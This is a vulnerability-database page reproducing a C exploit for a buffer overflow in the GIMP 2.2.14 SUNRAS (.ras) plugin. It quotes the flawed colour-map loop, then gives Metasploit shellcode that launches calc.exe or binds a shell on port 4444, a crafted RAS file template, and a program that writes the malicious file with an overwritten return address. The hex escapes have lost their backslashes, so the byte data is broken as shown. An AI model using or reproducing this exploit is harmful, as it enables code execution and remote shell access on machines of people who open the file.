Vulners
Lucene search
Gimp 2.2.14 .RAS File SUNRAS Plugin Buffer Overflow Exploit
/*****************************************************************************
* *
* Gimp v2.2.14 .RAS File SUNRAS Plugin Buffer Overflow *
* *
* *
* Gimp uses SUNRAS plugin to process .RAS file. But this module is vulnerable *
* to a buffer overflow in set_color_table which leads to code execution. *
* *
* Vulnerable code, sunras.c:862 *
* *
* int ncols, j; *
* guchar ColorMap[256*3]; *
* *
* ncols = sunhdr->l_ras_maplength / 3; *
* if (ncols <= 0) return; *
* *
* for (j = 0; j < ncols; j++) *
* { *
* ColorMap[j*3] = suncolmap[j]; *
* ColorMap[j*3+1] = suncolmap[j+ncols]; *
* ColorMap[j*3+2] = suncolmap[j+2*ncols]; *
* } *
* *
* This exploit runs calc.exe or binds shell to port 4444. *
* Tested against Win XP SP2 FR but the bug exists in all systems. *
* Have Fun! *
* *
* Coded and discovered by Marsu <[email protected]> *
*****************************************************************************/
#include "stdio.h"
#include "stdlib.h"
/* win32_exec - EXITFUNC=process CMD=calc.exe Size=164 Encoder=PexFnstenvSub http://metasploit.com */
unsigned char CalcShellcode[] =
"x31xc9x83xe9xddxd9xeexd9x74x24xf4x5bx81x73x13x98"
"x11xbexa7x83xebxfcxe2xf4x64xf9xfaxa7x98x11x35xe2"
"xa4x9axc2xa2xe0x10x51x2cxd7x09x35xf8xb8x10x55xee"
"x13x25x35xa6x76x20x7ex3ex34x95x7exd3x9fxd0x74xaa"
"x99xd3x55x53xa3x45x9axa3xedxf4x35xf8xbcx10x55xc1"
"x13x1dxf5x2cxc7x0dxbfx4cx13x0dx35xa6x73x98xe2x83"
"x9cxd2x8fx67xfcx9axfex97x1dxd1xc6xabx13x51xb2x2c"
"xe8x0dx13x2cxf0x19x55xaex13x91x0exa7x98x11x35xcf"
"xa4x4ex8fx51xf8x47x37x5fx1bxd1xc5xf7xf0x6fx66x45"
"xebx79x26x59x12x1fxe9x58x7fx72xdfxcbxfbx3fxdbxdf"
"xfdx11xbexa7";
/* win32_bind - EXITFUNC=seh LPORT=4444 Size=344 Encoder=PexFnstenvSub http://metasploit.com */
unsigned char BindShellcode[] =
"x33xc9x83xe9xb0xd9xeexd9x74x24xf4x5bx81x73x13x5c"
"x7bx78x7fx83xebxfcxe2xf4xa0x11x93x32xb4x82x87x80"
"xa3x1bxf3x13x78x5fxf3x3ax60xf0x04x7ax24x7ax97xf4"
"x13x63xf3x20x7cx7ax93x36xd7x4fxf3x7exb2x4axb8xe6"
"xf0xffxb8x0bx5bxbaxb2x72x5dxb9x93x8bx67x2fx5cx57"
"x29x9exf3x20x78x7ax93x19xd7x77x33xf4x03x67x79x94"
"x5fx57xf3xf6x30x5fx64x1ex9fx4axa3x1bxd7x38x48xf4"
"x1cx77xf3x0fx40xd6xf3x3fx54x25x10xf1x12x75x94x2f"
"xa3xadx1ex2cx3ax13x4bx4dx34x0cx0bx4dx03x2fx87xaf"
"x34xb0x95x83x67x2bx87xa9x03xf2x9dx19xddx96x70x7d"
"x09x11x7ax80x8cx13xa1x76xa9xd6x2fx80x8ax28x2bx2c"
"x0fx28x3bx2cx1fx28x87xafx3ax13x69x23x3ax28xf1x9e"
"xc9x13xdcx65x2cxbcx2fx80x8ax11x68x2ex09x84xa8x17"
"xf8xd6x56x96x0bx84xaex2cx09x84xa8x17xb9x32xfex36"
"x0bx84xaex2fx08x2fx2dx80x8cxe8x10x98x25xbdx01x28"
"xa3xadx2dx80x8cx1dx12x1bx3ax13x1bx12xd5x9ex12x2f"
"x05x52xb4xf6xbbx11x3cxf6xbex4axb8x8cxf6x85x3ax52"
"xa2x39x54xecxd1x01x40xd4xf7xd0x10x0dxa2xc8x6ex80"
"x29x3fx87xa9x07x2cx2ax2ex0dx2ax12x7ex0dx2ax2dx2e"
"xa3xabx10xd2x85x7exb6x2cxa3xadx12x80xa3x4cx87xaf"
"xd7x2cx84xfcx98x1fx87xa9x0ex84xa8x17xacxf1x7cx20"
"x0fx84xaex80x8cx7bx78x7f";
char RAS[]=
"x59xa6x6ax95x00x00x01xfdx00x00x01xb6x00x00x00x08"
"x00x03x68x94x00x00x00x00x00x00x00x01x00x00x03x29"
"x1bxffxbcxefx73xd9x13x00x70xf0xccx8dx99x50xf1xf7"
"xacx4dxf0xabxe0xecxefx2exe5x8cxefxa6x33x8cxc6xfa"
"xfex00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x1bxffxd7x64x8bx7cx41x84x00x2dx00xd0x99x94xe9xad"
"xb4x4bxc9x85xe9xe5xb4x80x98x8cxe0xc4x33xb6xd5xf7"
"x01x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00xe3x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x19xffxeax2exd2xd9xb6xb4x00x6cxccxe6x99xc5xe6x32"
"xb4x51x90x90x24x00x00x00x3ax8cxd3xd9x33xd5xddxf3"
"x02x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x7bx00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x42x42x42x42x42x42x42x42x42x42x42x42x42x42x42x42"
"x42x42x42x42x42x42x42x42x42x42x42x42x42x42x42x42"
"x42x42x42x42x42x42x42x42x42x42x42x42x42x42x42x42"
"x42x42x42x42x42x42x42x42x42x42x42x42xebx10x81x90"
"x8bxf8x00x0dxffx42x42x42x42x42x42x42x42x42x42x42"
"x42x42x42x42x42x42x42x42x42x42x42x42x42x42x42x42"
"x42x42x42x42x42x42x42x42x42x42x42x42x42x42x42x42"
"x42x42x42x42x42x42x42x42x42x42x42x42x42x42x42x42"
"x42x42x42x42x42x42x42x42x42x42x42x42x42x42x42x42"
"x42x42x42x42x42x42x42x42x42x42x42x42x42x42x42x42"
"x42x42x42x42x42x42x42x42x42x42x42x42x42x42x42x42"
"x42x42x42x42x42x42x42x42x42x42x42x42x42x42x42x42"
"x42x42x42x42x42x42x42x42x42x42x42x42x42x42x42x42"
"x42x42x42x42x42x42x42x42x42x42x42x42x42x42x42x42"
"x42x42x42x42x42x42x42x42x42x42x42x42x42x42x42x42"
"x42x42x42x42x42x42x42x42x42x42x42x42x42x42x42x42"
"x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01"
"x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01"
"x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01"
"x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01"
"x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01"
"x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01"
"x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01"
"x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01"
"x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01"
"x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01"
"x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01"
"x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01"
"x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01"
"x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01"
"x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01"
"x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01"
"x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01"
"x01x01x01x01x01x01x01x01x01x01x01x01x01x00x01x01"
"x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01"
"x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01"
"x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01"
"x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01"
"x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01"
"x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01"
"x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01"
"x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01"
"x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01"
"x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01"
"x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01"
"x01x4ex01x01x01x01x01x01x01x01x01x01x01x01x01x01"
"x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x22"
"x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01"
"x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01"
"x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01"
"x01x01x01x01x01x01x01x01x01x01xd5x01x01x01x01x01"
"x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01"
"x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01"
"x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01"
"x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01"
"x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01"
"x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01"
"x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01"
"x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01"
"x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01"
"x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01"
"x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01"
"x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01"
"x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01"
"x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01"
"x01x01x01x01x01x01x01x01x01x01x01x00x01x01x01x01"
"x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01"
"x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01"
"x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01"
"x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01"
"x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01"
"x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01"
"x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01"
"x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01"
"x01x01x01x35x01x01x01x01x01x01x01x01x01x01x01x01"
"x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01"
"x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01"
"xb3x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01"
"x01x01x01x01x01x01x01x01x3dx01x01x01x01x01x01x01"
"x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01"
"x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01"
"x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01"
"x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01"
"x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01"
"x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01"
"x01x01x01x01x01x01x01x01x01x01x4ax01x01x01x01x01"
"x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01"
"x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01"
"x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01"
"x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01"
"x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01"
"x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01"
"x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01"
"x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01"
"x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01"
"x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01"
"x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01"
"x01x01x01x01x01x01x01x01x01x00x01x01x01x01x01x01"
"x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01"
"x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01"
"x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01"
"x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01"
"x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01"
"x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01"
"x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01"
"x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01"
"x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01"
"x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01"
"x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01"
"x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01"
"x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01"
"x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01"
"x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01"
"x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01"
"x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01"
"x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01"
"x01x01x01x01x01x01x01x1fx01x01x01x01x01x01x01x01"
"x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01"
"x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01"
"x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01"
"x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01"
"x01x01x01x01x01x01x01x01x01x01xddx01x01x01x01x01"
"x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01"
"x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01"
"x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01"
"x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01"
"x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01"
"x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01"
"x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01"
"x01x01x01x01x01x01x01x00x01x01x01x01x01x01x01x01"
"x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01"
"x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01"
"x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01"
"x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01"
"x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01"
"x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01"
"x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01"
"x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01"
"x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01"
"x01x01x01x01x01x01x01x01xf8x01x01x01x01x01x01x01"
"x01x01x01x01x01x01x01x01x05x05x01x01x01x01x01x01"
"x01x01x01x10x11x01x01x01x01x01x01x01x01x01x01x01"
"x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01"
"x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01"
"x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01"
"x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01"
"x01x01x01x01x01x01x01x01x01x01x01x01x01x0ax11x11"
"x11x11x19x0ax01x01x01x01x10x0ex01x01x01x01x01x05"
"x08x1fx01x15x11x1cx1cx0ax01x01x01x01x01x01x01x01"
"x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01"
"x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01"
"x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01"
"x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01"
"x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01"
"x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01"
"x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01"
"x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01"
"x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01"
"x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01"
"x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01"
"x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01"
"x01x01x01x01x01x00x01x01x01x01x01x01x01x01x01x01"
"x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01"
"x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01"
"x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01"
"x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01"
"x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01"
"x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01"
"x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01"
"x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01"
"x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01"
"x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01"
"x01x01x01x01x01x01x08x11x01x01x01x01x01x01x01x01"
"x01x10x00x01x01x01x01x01x01x01x01x01x01x01x01x01"
"x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01"
"x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01"
"x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01"
"x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01"
"x01x01x01x01x01x01x01x01x01x01x01x19x00x0cx19x08"
"x11x00x08xfbx01x01x08x11x01x01x01x01x01x0ax00x1f"
"x1fx11x08x0ax19x00x05x01x01x01x01x01x01x01x01x01"
"x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01"
"x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01"
"x01x01x01x01x01x01x01x01x01x01x01xcdx01x01x01x01"
"x8bx01x01x01x01x01x01x01x01x01x01x01x01x01x01x01"
"x01x01x01x01x01x01x01x01x01x01x01x01x1ax01x01x01"
"x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01"
"x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01"
"x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01"
"x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01"
"x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01"
"x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01"
"x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01"
"x01x01x01x00x01x01x01x01x01x01x01x01x01x01x01x01"
"x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01"
"x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01"
"x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01"
;
int main(int argc, char* argv[])
{
FILE* rasfile;
char evilbuff[4000];
int offset=0;
printf("[+] Gimp v2.2.14 .RAS File SUNRAS Plugin Buffer Overflow
");
printf("[+] Coded and discovered by Marsu <[email protected]>
");
if (argc!=3) {
printf("[+] Usage: %s Mode <file.ras>
",argv[0]);
printf("[+] Mode is 0 -> run calc.exe
");
printf("[+] 1 -> bind shell to port 4444
");
return 0;
}
memcpy(evilbuff,RAS,sizeof(RAS)-1);
/*pffff this part is ... hum ... complicated!
well, we can access our shellcode at [ESP+0xF4]-0x0D00 so we put on the top of the stack:
NOP
NOP
NOP
NOP
MOV EAX,[ESP+0xF8] <- do not forget ret add!
SUB EAX,0x0D00
CALL EAX
and we replace EIP by CALL ESP, say 0x7c81518b in Kernel32
*/
memset(evilbuff+0x125,0x7c,1);
memset(evilbuff+0x33e,0x81,1);
memset(evilbuff+0x231,0x51,1);
memset(evilbuff+0x124,0x8b,1);
if (!atoi(argv[1]))
memcpy(evilbuff+0x380,CalcShellcode,sizeof(CalcShellcode)-1);
else
memcpy(evilbuff+0x380,BindShellcode,sizeof(BindShellcode)-1);
if ((rasfile=fopen(argv[2],"wb"))==0) {
printf("[-] Unable to access file.
");
return 0;
}
fwrite( evilbuff, 1, 4000, rasfile );
fclose(rasfile);
printf("[+] Done. Have fun!
");
return 0;
}
// sebug.net
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
25 May 2007 00:00Current
7.1High risk
Vulners AI Score7.1